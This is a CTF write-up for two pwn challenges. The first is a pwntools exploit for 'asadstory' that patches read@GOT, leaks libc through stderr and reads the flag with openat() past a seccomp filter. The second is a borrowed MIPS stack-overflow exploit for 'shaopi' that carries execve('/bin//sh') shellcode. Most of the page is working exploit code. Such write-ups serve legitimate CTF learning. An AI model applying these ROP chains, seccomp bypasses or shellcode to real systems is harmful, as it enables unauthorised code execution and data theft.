DBASCTF And TPCTF

DBS and TP

DBSCTF CBCTF 2023 11月

asadstory

主要有两个难点:

1.程序关闭了标准输出(fd 1),所以泄露的地址和 flag 都只能通过标准错误(fd 2)输出;另外 fd 1 被关闭后,后面 openat() 打开 flag 得到的新 fd 就是 1,exp 里 read 的第一个参数写 1 正是这个原因。
2.沙盒禁用了 open 系统调用(注意:下面的 exp 仍然正常使用 read 系统调用,所以被禁的应该是 open 而不是 read),可以改用 **openat()** 来打开文件,注意 openat() 的参数格式(x86-64 下系统调用号为 0x101)。

openat():
openat(int fd,const char *path,int oflag,...);
// fd: directory descriptor that a *relative* path is resolved against.
//     AT_FDCWD (-100; as an unsigned 64-bit register value 0xffffffffffffff9c)
//     means "the current working directory".
// path: the file to open, here "./flag".
// oflag: open flags. 0 is O_RDONLY -- it does NOT create a missing file;
//        creating one would need O_CREAT plus a mode in the "..." argument.
// On x86-64 openat is syscall number 0x101 (257); it is the usual way around
// a seccomp filter that only blocks open().

然后,用 ret2csu 调一次 read(0, read@got, 1) 改掉 read 的 GOT 表项低字节,让它指向 libc 里的一条 syscall 指令;这次 read 的返回值 1 正好是 SYS_write 的调用号,于是再经同一个 GOT 表项调用就变成 write(2, read@got, 0x10),把 libc 地址泄露到标准错误;最后用 libc 里的 gadget 做 openat/read/write。注意 exp 里的 gadget 偏移和 0x10dfd0 都只对题目给的 libc 版本有效。

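from pwn import *

# Exploit for "asadstory" (x86-64, PIE).
#
# Challenge constraints, as described in the writeup notes above:
#   * stdout is closed -> every leak and the flag itself go to stderr (fd 2);
#   * the sandbox blocks open(), so the flag file is opened with openat();
#   * the menu prints a function address, which gives the PIE base.
#
# Stage 1 (stage1_leak_libc): ret2csu chain.  read(0, read@GOT, 1) patches the
# low byte of read's GOT entry so that it points at a `syscall` instruction
# inside libc; because that read() returns 1 == SYS_write, calling through the
# same GOT slot again performs write(2, read@GOT, 0x10) and leaks the
# (patched) libc pointer to stderr.  The chain then returns into the
# vulnerable function to get a second overflow.
# Stage 2 (stage2_orw): plain pop-gadget chain from libc: read the path
# "./flag" into .bss, openat(AT_FDCWD, path, O_RDONLY), read the file, write
# it to stderr.
#
# All constants below (binary offsets, libc gadget offsets, the 0x10dfd0
# leak delta and the 0xd0 patch byte) are tied to this build of the challenge
# and to the remote libc; re-derive them for any other environment.

context(arch='amd64', os='linux', log_level='debug')

HOST = "node4.buuoj.cn"
PORT = 28900

# --- offsets inside the PIE binary -------------------------------------------
PRINTED_FUNC = 0x1249   # the function whose address the menu prints
CSU_POP6_RET = 0x163A   # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_CALL = 0x1620       # assumed: mov rdx,r14; mov rsi,r13; mov edi,r12d; call [r15+rbx*8]
VULN_RET = 0x1468       # re-enter the vulnerable function for the second overflow
BSS_PATH = 0x4100       # scratch buffer for the file name
BSS_DATA = 0x4200       # scratch buffer for the flag contents
OVERFLOW_PAD = 0x38     # distance from the buffer to the saved return address

# --- offsets inside the remote libc ------------------------------------------
LIBC_LEAK_DELTA = 0x10dfd0   # value of the patched read@GOT entry minus libc base
POP_RAX_RET = 0x36174
POP_RDX_RET = 0x142c92
POP_RDI_RET = 0x23b6a
POP_RSI_RET = 0x2601f
SYSCALL_RET = 0x83f6c

SYS_READ = 0
SYS_WRITE = 1
SYS_OPENAT = 0x101
AT_FDCWD = 0xffffffffffffff9c   # -100 as an unsigned 64-bit register value
STDIN, STDERR = 0, 2


def csu_call(base, rdi, rsi, rdx, fn_ptr):
    """Return a flat() fragment for one ret2csu call through *fn_ptr.

    fn_ptr is the address of a pointer to the function (here read@GOT);
    rdi/rsi/rdx are the three arguments.  The fragment ends with the 7
    qwords (add rsp,8 + six pops) the call gadget consumes before its ret.
    """
    return [
        base + CSU_POP6_RET,
        0,        # rbx: index into [r15 + rbx*8]
        1,        # rbp: makes `cmp rbp, rbx` succeed after `add rbx, 1`
        rdi,      # r12 -> edi
        rsi,      # r13 -> rsi
        rdx,      # r14 -> rdx
        fn_ptr,   # r15 -> call [r15]
        base + CSU_CALL,
        [0] * 7,
    ]


def syscall_chain(libc_base, nr, rdi, rsi, rdx):
    """Return a flat() fragment that performs syscall `nr`(rdi, rsi, rdx)."""
    return [
        libc_base + POP_RAX_RET, nr,
        libc_base + POP_RDI_RET, rdi,
        libc_base + POP_RSI_RET, rsi,
        libc_base + POP_RDX_RET, rdx,
        libc_base + SYSCALL_RET,
    ]


def stage1_leak_libc(io, base, got_read):
    """Patch read@GOT into a syscall gadget and leak libc; return libc base."""
    payload = flat(
        cyclic(OVERFLOW_PAD),
        # read(0, read@GOT, 1): overwrite the low byte of the GOT entry
        csu_call(base, STDIN, got_read, 1, got_read),
        # call through the patched slot; rax is still 1 (bytes read), i.e.
        # SYS_write -> write(2, read@GOT, 0x10) to stderr
        csu_call(base, STDERR, got_read, 0x10, got_read),
        base + VULN_RET,
    )
    io.sendline(payload)
    io.send(b'\xd0')   # the single byte read into read@GOT
    leaked = u64(io.recvuntil(b'\x7f').ljust(8, b'\x00'))
    return leaked - LIBC_LEAK_DELTA


def stage2_orw(io, base, libc_base):
    """openat/read/write the flag to stderr with libc pop gadgets."""
    path_buf = base + BSS_PATH
    data_buf = base + BSS_DATA
    payload = flat(
        cyclic(OVERFLOW_PAD),
        # read(0, path_buf, 0x10): receive "./flag\0" into .bss
        syscall_chain(libc_base, SYS_READ, STDIN, path_buf, 0x10),
        # openat(AT_FDCWD, path_buf, O_RDONLY).  stdout is closed, so the new
        # descriptor is presumably the lowest free one, fd 1 -- hence the 1 below.
        syscall_chain(libc_base, SYS_OPENAT, AT_FDCWD, path_buf, 0),
        # read(1, data_buf, 0x30)
        syscall_chain(libc_base, SYS_READ, 1, data_buf, 0x30),
        # write(2, data_buf, 0x30): the flag goes to stderr
        syscall_chain(libc_base, SYS_WRITE, STDERR, data_buf, 0x30),
    )
    io.sendline(payload)
    io.send(b'./flag\x00')


def main():
    # io = process("./challenge")
    io = remote(HOST, PORT)
    elf = ELF("./challenge")

    io.sendlineafter(b"1.yes / 2.no\n", b'1')
    io.sendlineafter("2.痛苦面具\n".encode(), b'1')
    io.recvuntil("函数的地址:".encode())
    # the address is printed as "0x" followed by 12 hex digits
    base = int(io.recv(14), 16) - PRINTED_FUNC
    success('base: ' + hex(base))

    io.recvrepeat(1)   # drain the rest of the menu before the overflow
    io.sendline(b'2')
    libc_base = stage1_leak_libc(io, base, base + elf.got['read'])
    success('libc_base: ' + hex(libc_base))

    stage2_orw(io, base, libc_base)
    io.interactive()


if __name__ == "__main__":
    main()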

shaopi

好像是MIPS Pwn,要看得懂汇编
。。。。。。后续看
先贴一段别人的exp:

from pwn import *

# "shaopi": 32-bit little-endian MIPS stack overflow, run under qemu-user.
# Someone else's exploit (see the note above), kept unchanged apart from
# naming and comments.
#
# Control flow after the overflow (inferred from the gadget comments, not
# verified here): the saved $ra presumably goes to 0x0043965C, which sets
# $a2 = $sp + 0x58 and jalr's to the saved $fp (0x0040ABB8), which in turn
# jumps to $a2 -- i.e. back into the stack buffer where the shellcode was
# placed.  This requires an executable stack.

context(log_level='debug', arch='mips', endian='little')

GADGET_A2_JALR_FP = 0x0043965C   # addiu $a2,$sp,0x68+var_10 | jalr $fp
GADGET_JALR_A2 = 0x0040ABB8      # move $t9,$a2 | jalr $a2

target = process(["qemu-mipsel", "./challenge"])
# target = gdb.debug("./challenge", 'b *0x00400CB4')

target.sendlineafter('your passphrase: ', '三元一串十元三串')

# Hand-written execve("/bin//sh", 0, 0): the double slash pads the path to
# exactly 8 bytes so it fits two 32-bit stores; 4011 is __NR_execve on o32,
# and `syscall 0x40404` keeps NUL bytes out of the encoding.
# shellcraft.mips.linux.sh() would produce an equivalent stub.
SHELLCODE_SRC = '''
lui $t6,0x6e69
ori $t6,$t6,0x622f
sw $t6,28($sp)

lui $t7,0x6873
ori $t7,$t7,0x2f2f
sw $t7,32($sp)
sw $zero,36($sp)

la $a0,28($sp)

addiu $a1,$zero,0
addiu $a2,$zero,0
addiu $v0,$zero,4011

syscall 0x40404
'''
shellcode = asm(SHELLCODE_SRC)
print(hex(len(shellcode)))

# Overflow layout: 0x40 bytes of filler, the two gadget addresses, padding
# up to 0xa0 bytes, then the shellcode.
saved_regs = p32(GADGET_JALR_A2) + p32(GADGET_A2_JALR_FP)
overflow = (cyclic(0x40) + saved_regs).ljust(0xa0, b'a') + shellcode
target.sendafter('Congratulation!\n', overflow)

target.interactive()

TPCTF
